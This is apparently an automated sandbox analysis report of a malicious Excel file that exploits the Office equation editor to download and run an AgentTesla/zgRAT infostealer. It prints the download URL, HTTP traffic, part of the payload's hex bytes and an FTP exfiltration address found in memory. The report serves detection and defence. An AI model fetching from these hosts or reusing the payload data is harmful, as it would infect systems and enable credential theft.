Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Source: global traffic TCP traffic: 198.12.89.152:80 -> 192.168.2.22:49179
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49179 -> 198.12.89.152:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 08 Aug 2022 15:26:50 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.0.19Last-Modified: Mon, 08 Aug 2022 13:26:41 GMTETag: "dae00-5e5bac4276722"Accept-Ranges: bytesContent-Length: 896512Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d 0f f1 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a6 0d 00 00 06 00 00 00 00 00 00 2e c5 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 c4 0d 00 53 00 00 00 00 e0 0d 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a5 0d 00 00 20 00 00 00 a6 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b0 03 00 00 00 e0 0d 00 00 04 00 00 00 a8 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 ac 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c5 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 08 d2 0c 00 d0 f2 00 00 03 00 00 00 b7 00 00 06 28 b0 00 00 e0 21 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 01 00 00 00 01 00 00 11 2a 00 00 00 13 30 07 00 d8 00 00 00 01 00 00 11 02 19 8d 4b 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 4b 00 00 70 a2 25 18 72 59 00 00 70 a2 7d 02 00 00 04 02 14 7d 03 00 00 04 02 28 16 00 00 0a 20 03 6d 2f 17 20 e3 d6 7e 66 61 25 0a 1c 5e 45 06 00 00 00 19 00 00 00 35 00 00 00 02 00 00 00 64 00 00 00 d4 ff ff ff 45 00 00 00 2b 62 00 00 02 28 13 00 00 06 06 20 7e a4 05 de 5a 20 b0 66 13 3d 61 2b c0 02 7b 0f 00 00 04 1b 28 19 00 00 06 00 06 20 90 2c 64 b5 5a 20 cc df a4 7b 61 2b a4 00 06 20 99 ca 63 a7 5a 20 26 cf 38 56 61 2b 94 00 02 7b 19 00 00 04 1b 28 19 00 00 06 06 20 aa 93 e2 7a 5a 20 10 37 37 e8 61 38 75 ff ff ff 7e 04 00 00 04 74 03 00 00 01 02 7b 02 00 00 04 28 1a 00 00 06 26 2a 13 30 03 00 3a 00 00 00 01 00 00 11 00 20 92 ef 9c 68 20 91 b6 de 3e 61 25 0a 19 5e 45 03 00 00 00 e0 ff ff ff 02 00 00 00 17 00 00 00 2b 15 02 28 08 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /mon/mon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.89.152Connection: Keep-Alive
Contains functionality to download and execute PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0517
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.89.152
Source: EQNEDT32.EXE, 00000002.00000002.980461648.00000000005E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.980461648.00000000005E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://ftp.alonsorojasmudanzasnacionales.com/okok
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: EQNEDT32.EXE, 00000002.00000002.980927882.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.980231565.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.89.152/mon/mon.exe
Source: EQNEDT32.EXE, 00000002.00000002.980379533.00000000005A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://198.12.89.152/mon/mon.exehhC:
Source: Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://77qlBFDgeMeBhXCCMul.org
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ZSkVPd.com
Source: Regasm_svchost.exe, 00000006.00000002.1174896725.000000000262C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Regasm_svchost.exe, 00000006.00000002.1174455901.0000000002527000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9FBCD146.wmf Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_033F0517 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess, 2_2_033F0517
Source: global traffic HTTP traffic detected: GET /mon/mon.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.89.152Connection: Keep-Alive

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 6.0.Regasm_svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.365ed50.11.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3693370.9.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3693370.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.365ed50.11.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 5.2.Regasm_svchost.exe.3628930.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000005.00000002.989818369.0000000003628000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000006.00000000.986284628.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: Regasm_svchost.exe PID: 2884, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: Regasm_svchost.exe PID: 616, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\Regasm_svchost.exe Jump to dropped file
.NET source code contains very large array initializations
